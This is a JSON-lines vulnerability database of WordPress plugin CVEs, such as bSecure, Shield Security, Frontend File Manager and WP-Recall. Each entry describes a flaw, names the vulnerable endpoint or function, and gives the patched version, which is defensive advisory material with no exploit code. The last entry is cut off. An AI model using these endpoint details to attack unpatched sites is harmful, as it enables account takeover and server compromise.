{"CVE_ID":"CVE-2025-6187","slug":"bsecure","versionImpact":"2","versionEndExcluding":"2","description":"The bSecure plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its order_info REST endpoint in versions 1.3.7 through 1.7.9. The plugin registers the \/webhook\/v2\/order_info\/ route with a permission_callback that always returns true, effectively bypassing all authentication. This makes it possible for unauthenticated attackers who know any user\u2019s email to obtain a valid login cookie and fully impersonate that account.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-bsecure-checkout.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-bsecure-checkout.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-wc-bsecure.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsecure\\\/tags\\\/1.7.9\\\/includes\\\/class-wc-bsecure.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bsecure\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bsecure\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8f51029-0748-4943-b0ef-fc822b14614a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8f51029-0748-4943-b0ef-fc822b14614a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3880","slug":"social-polls-by-opinionstage","versionImpact":"19.9.0","versionEndExcluding":"19.10.0","description":"The Poll, Survey & Quiz Maker Plugin by Opinion Stage plugin for WordPress is vulnerable to unauthorized modification of data due to a misconfigured capability check on several functions in all versions up to, and including, 19.9.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to change the email address for the account connection, and disconnect the plugin. Previously created content will still be displayed and functional if the account is disconnected.","recommendation":"Update to version 19.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/src\\\/Modules\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-polls-by-opinionstage\\\/trunk\\\/src\\\/Modules\\\/Admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310848\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310848\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba86268a-7bd6-40ed-9af6-29409245675d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba86268a-7bd6-40ed-9af6-29409245675d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4344","slug":"wp-simple-firewall","versionImpact":"19.1.10","versionEndExcluding":"19.1.11","description":"The Shield Security \u2013 Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 19.1.13. This is due to missing or incorrect nonce validation on the exec function. This makes it possible for unauthenticated attackers to disable pin protection for the admin interface of the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 19.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3b9cde-e4d8-4217-96b4-f6ad00cd3a2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d3b9cde-e4d8-4217-96b4-f6ad00cd3a2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-firewall\\\/trunk\\\/src\\\/lib\\\/src\\\/ActionRouter\\\/Actions\\\/SecurityAdminRemove.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-firewall\\\/trunk\\\/src\\\/lib\\\/src\\\/ActionRouter\\\/Actions\\\/SecurityAdminRemove.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3079504%40wp-simple-firewall%2Ftrunk&old=3079461%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3079504%40wp-simple-firewall%2Ftrunk&old=3079461%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6989","slug":"wp-simple-firewall","versionImpact":"18.5.9","versionEndExcluding":"18.5.10","description":"The Shield Security \u2013 Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 18.5.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063826cc-7ff3-4869-9831-f6a4a4bbe74c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/063826cc-7ff3-4869-9831-f6a4a4bbe74c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013699%40wp-simple-firewall&new=3013699%40wp-simple-firewall&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4359","slug":"nmedia-user-file-uploader","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary Post Deletion in versions up to, and including, 18.2. This is due to lacking authentication protections and lacking a security nonce on the wpfm_delete_file AJAX action. This makes it possible for unauthenticated attackers to delete any posts and pages on the site.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84c61d00-20c1-4176-a74d-ea6ff6220f26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84c61d00-20c1-4176-a74d-ea6ff6220f26?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4356","slug":"nmedia-user-file-uploader","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Download\r\n in versions up to, and including, 18.2. This is due to lacking authentication protections, capability checks, and sanitization, all on the wpfm_file_meta_update AJAX action. This makes it possible for unauthenticated attackers to download arbitrary files on the site, potentially leading to site takeover.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79e2011c-5e4d-4d02-831f-6b4dcfcaa51e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79e2011c-5e4d-4d02-831f-6b4dcfcaa51e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4351","slug":"nmedia-user-file-uploader","versionImpact":"18.2","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated Post Meta Change in versions up to, and including, 18.2. This is due to lacking authentication protections, capability checks, and sanitization, all on the wpfm_file_meta_update AJAX action. This makes it possible for unauthenticated attackers to change the meta data of certain posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5539aa79-66ad-43fa-967c-2bec877061e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5539aa79-66ad-43fa-967c-2bec877061e0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4350","slug":"nmedia-user-file-uploader","versionImpact":"18.2","versionEndExcluding":"18.3","description":"The Frontend File Manager plugin for WordPress is vulnerable to Unauthenticated HTML Injection in versions up to, and including, 18.2. This is due to lacking authentication protections on the wpfm_send_file_in_email AJAX action. This makes it possible for unauthenticated attackers to send emails using the site with a custom subject, recipient email, and body with unsanitized HTML content.  This effectively lets the attacker use the site as a spam relay.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49150180-9de0-4318-b21b-779daaeb7a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49150180-9de0-4318-b21b-779daaeb7a52?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4328","slug":"n-media-woocommerce-checkout-fields","versionEndExcluding":"18.0","description":"The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13775","slug":"woocommerce-support-ticket-system","versionImpact":"17.8","versionEndExcluding":"17.9","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to unauthorized access and loss of data due to missing capability checks on the 'ajax_delete_message', 'ajax_get_customers_partial_list', and 'ajax_get_admins_list' functions in all versions up to, and including, 17.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts, and read names, emails, and capabilities of all users.","recommendation":"Update to version 17.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050#item-description__change-log\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050#item-description__change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72dc919a-c13d-49b4-927d-a0bb837b63dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72dc919a-c13d-49b4-927d-a0bb837b63dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10627","slug":"woocommerce-support-ticket-system","versionImpact":"17.7","versionEndExcluding":"17.8","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_manage_file_chunk_upload() function in all versions up to, and including, 17.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 17.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac218f6-0bfa-480c-9159-d75a027022ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac218f6-0bfa-480c-9159-d75a027022ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10626","slug":"woocommerce-support-ticket-system","versionImpact":"17.7","versionEndExcluding":"17.8","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_uploaded_file() function in all versions up to, and including, 17.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 17.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb2c829-579f-41e2-ad5f-8e4fc125d980?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeb2c829-579f-41e2-ad5f-8e4fc125d980?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10625","slug":"woocommerce-support-ticket-system","versionImpact":"17.6","versionEndExcluding":"17.8","description":"The WooCommerce Support Ticket System plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_tmp_uploaded_file() function in all versions up to, and including, 17.7. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 17.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddf1cecd-c630-498d-9aa0-3d0adeb73033?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddf1cecd-c630-498d-9aa0-3d0adeb73033?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-support-ticket-system\\\/17930050\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6043","slug":"wp-malware-removal","versionImpact":"17.0","versionEndExcluding":"17.1","description":"The Malcure Malware Scanner \u2014 #1 Toolset for WordPress Malware Removal plugin for WordPress is vulnerable to Arbitrary File Deletion due to a missing capability check on the wpmr_delete_file() function in all versions up to, and including, 16.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files making remote code execution possible. This is only exploitable when advanced mode is enabled on the site.","recommendation":"Update to version 17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L4570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L4570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-malware-removal\\\/tags\\\/16.8\\\/wpmr.php#L6401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44fe4d7-1af5-4e26-a33c-43a9cce4174c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44fe4d7-1af5-4e26-a33c-43a9cce4174c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7772","slug":"wp-malware-removal","versionImpact":"16.8","versionEndExcluding":"16.9","description":"The Malcure Malware Scanner \u2014 #1 Toolset for WordPress Malware Removal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 16.8 via the wpmr_inspect_file() function due to a missing capability check. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 16.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309451%40wp-malware-removal&new=3309451%40wp-malware-removal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309451%40wp-malware-removal&new=3309451%40wp-malware-removal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ce05fa-0b10-4796-9e78-03e653b862da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ce05fa-0b10-4796-9e78-03e653b862da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11150","slug":"wp-user-extra-fields","versionImpact":"16.6","versionEndExcluding":"16.7","description":"The WordPress User Extra Fields plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_tmp_uploaded_file() function in all versions up to, and including, 16.6. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 16.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad39d797-9230-41d9-a335-864845b56aa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad39d797-9230-41d9-a335-864845b56aa0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10800","slug":"wp-user-extra-fields","versionImpact":"16.6","versionEndExcluding":"16.7","description":"The WordPress User Extra Fields plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the ajax_save_fields() function in all versions up to, and including, 16.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to add custom fields that can be updated and then use the check_and_overwrite_wp_or_woocommerce_fields function to update the wp_capabilities field to have administrator privileges.","recommendation":"Update to version 16.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a18fa7e6-813d-4b48-bd4e-5232fb8382d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a18fa7e6-813d-4b48-bd4e-5232fb8382d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10801","slug":"wp-user-extra-fields","versionImpact":"16.5","versionEndExcluding":"16.6","description":"The WordPress User Extra Fields plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_manage_file_chunk_upload() function in all versions up to, and including, 16.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. User registration must be enabled for this to be exploited.","recommendation":"Update to version 16.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a60e2c3-4597-4b21-ad20-6a00e483fcf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a60e2c3-4597-4b21-ad20-6a00e483fcf1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/user-extra-fields\\\/12949844\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8292","slug":"wp-recall","versionImpact":"16.26.8","versionEndExcluding":"16.26.9","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to privilege escalation\/account takeover in all versions up to, and including, 16.26.8. This is due to to plugin not properly verifying a user's identity during new order creation. This makes it possible for unauthenticated attackers to supply any email through the user_email field and update the password for that user during new order creation. This requires the commerce addon to be enabled in order to exploit.","recommendation":"Update to version 16.26.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fa4b5df-dc71-49de-880b-895eb1d9cdca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fa4b5df-dc71-49de-880b-895eb1d9cdca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/functions-frontend.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/functions-frontend.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/rcl-functions.php#L1339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recall\\\/tags\\\/16.26.8\\\/rcl-functions.php#L1339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145798\\\/wp-recall\\\/trunk\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145798\\\/wp-recall\\\/trunk\\\/add-on\\\/commerce\\\/classes\\\/class-rcl-create-order.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9770","slug":"wp-recall","versionImpact":"16.26.11","versionEndExcluding":"16.26.12","description":"The WP-Recall  WordPress plugin before 16.26.12 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d31f8713-b807-4ac4-8897-7d62a93bb2db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d31f8713-b807-4ac4-8897-7d62a93bb2db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1325","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to arbitrary shortcode execution due to a missing capability check on the 'rcl_preview_post' AJAX endpoint in all versions up to, and including, 16.26.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 16.26.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/functions-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250094\\\/wp-recall\\\/trunk\\\/add-on\\\/publicpost\\\/functions-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad3b9040-05ed-452d-9b3f-26d1a93c62ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad3b9040-05ed-452d-9b3f-26d1a93c62ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1324","slug":"wp-recall","versionImpact":"16.26.10","versionEndExcluding":"16.26.12","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'public-form' shortcode in all versions up to, and including, 16.26.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 16.26.12, or a newer patched 